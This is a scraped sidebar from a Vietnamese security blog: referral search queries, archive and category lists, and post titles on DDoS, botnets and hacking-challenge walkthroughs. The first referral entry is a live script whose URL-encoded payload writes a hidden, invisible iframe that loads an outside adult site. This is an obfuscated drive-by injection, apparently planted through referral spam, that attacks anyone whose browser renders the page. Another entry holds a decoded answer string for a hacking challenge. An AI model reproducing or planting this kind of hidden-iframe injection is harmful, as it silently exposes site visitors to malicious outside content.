joomla <script language="javascript"> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%78%6F%6E%6C%69%6E%65%34%79%6F%75%2E%64%79%6E%2E%68%75%2F%31%35%2F%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A' ) ); </script> (www.google.com)
[Referral]
hellboundhackers basic 21 (www.google.com)
[Referral]
hellboundhackers hackthissite (www.google.com)
[Referral]
hellboundhackers + 16 (www.google.com)
[Referral]
hellboundhackers javascript (www.google.co.uk)
[Referral]
hellboundhackers solutions basic 10 (www.google.ca)
[Referral]
hellboundhackers basic6 (www.google.co.uk)
[Referral]
/challenges/basic5/index.php (www.google.co.uk)
[Referral]
JavaScript Challenges (www.google.bg)
[Referral]
moo = unescape('%69%6C%6F%76%65%6D%6F%6F') (www.google.com)
[Referral]
Họ tên
E-mail
(sẽ hiển thị
gravatar
theo email của bạn)
Trang chủ
Ghi nhớ
Bộ gõ
Tắt
TELEX
VNI
Ý kiến (Không dùng HTML)
Nhập mã kiểm tra :(chống xì-pum ý mà):
Tác giả
Tìm kiếm
Bài viết mới nhất
Một công cụ kiểm tra Rootkit made in VietNam
Nội dung hội thảo "Ngày an toàn thông tin 26/11/2008"
hackthissite.org (HTS) : web bacsic missions walk through (1-10)
MS Server Service Could Allow Remote Code Execution
LlyKil - người đã DDoS bkav.com.vn
DDoS bằng DDoS FlashX (2)
DDoS bằng DDoS FlashX
Bot & Botnet (phần 4)
Bot & Botnet (phần 3)
Bot & Botnet (phần 2)
Bot & Botnet (phần 1)
Web vulnerabilities to gain access to the system
What Does a System Administrator Do?
Vụ DDoS BKIS nhìn nhận từ góc độ hệ thống
Local by pass server windows with kshell ?
Lưu trữ
Lưu trữ theo ngày
Lưu trữ chuyên mục
Chuyên mục
.NET (21)
Blog (7)
CSharp (14)
Ajax (10)
Audio Book (1)
Âm nhạc (42)
Lời bài hát (16)
Bài viết hay (2)
Bạn bè - Người thân (11)
Bảo mật (66)
Data Mining (1)
Google (8)
Giải trí (46)
Hack (73)
Iphone (4)
Java (4)
Laptop (1)
Linux (34)
Ubuntu (11)
Linh tinh (10)
Mã nguồn mở (2)
MySql (2)
Networking (15)
Oracle (4)
Phim ảnh (2)
Photos (2)
PHP (8)
Regex (7)
Reverse engineering (1)
rootkit (1)
SQL Server 2000 (2)
sysadmin (1)
Tản mạn (15)
Technology (1)
Thơ (6)
Vi Thùy Linh (4)
Xuân Quỳnh (2)
Unicode (1)
Việt hóa (3)
Virus (4)
VoIP (5)
war game (9)
Website (38)
Windows (7)
XHTML & CSS (2)
Y!mash (2)
Liên kết
Trang chủ
Demo lọc nội dung
Guru Mail
Media Downloader
Bói tình củm
Sơn la Online
My Google Page
Mã hóa
Ngôn ngữ
svtunhien.net
Lưu trữ theo tháng
Tháng Giêng, 2009 (1)
Tháng Mười Một, 2008 (1)
Tháng Mười, 2008 (14)
Tháng Tám, 2008 (2)
Tháng Bảy, 2008 (5)
Tháng Sáu, 2008 (9)
Tháng Năm, 2008 (5)
Tháng Tư, 2008 (1)
Tháng Ba, 2008 (8)
Tháng Hai, 2008 (2)
Tháng Giêng, 2008 (2)
Tháng Mười Hai, 2007 (4)
Tháng Mười Một, 2007 (6)
Tháng Mười, 2007 (4)
Tháng Chín, 2007 (2)
Tháng Tám, 2007 (15)
Tháng Bảy, 2007 (16)
Tháng Sáu, 2007 (30)
Tháng Năm, 2007 (1)
Tháng Ba, 2007 (3)
Tháng Hai, 2007 (4)
Tháng Giêng, 2007 (15)
Tháng Mười Hai, 2006 (21)
Tháng Mười Một, 2006 (30)
Tháng Mười, 2006 (38)
Tháng Chín, 2006 (3)
Tháng Tám, 2006 (1)
Tháng Bảy, 2006 (7)
Tháng Sáu, 2006 (23)
Tháng Năm, 2006 (18)
Tháng Tư, 2006 (16)
Tháng Ba, 2006 (25)
Bạn bè
Bachmahoangtu
Cao Sơn
Chip 2.0
Đặng Quốc Khánh
haian82
Kiên XD
Long (lngt)
Scott Hanselman
Sue's little edream
zatuzik
Chuyên mục
.NET
Blog
CSharp
Ajax
Audio Book
Âm nhạc
Lời bài hát
Bài viết hay
Bạn bè - Người thân
Bảo mật
Data Mining
Google
Giải trí
Hack
Iphone
Java
Laptop
Linux
Ubuntu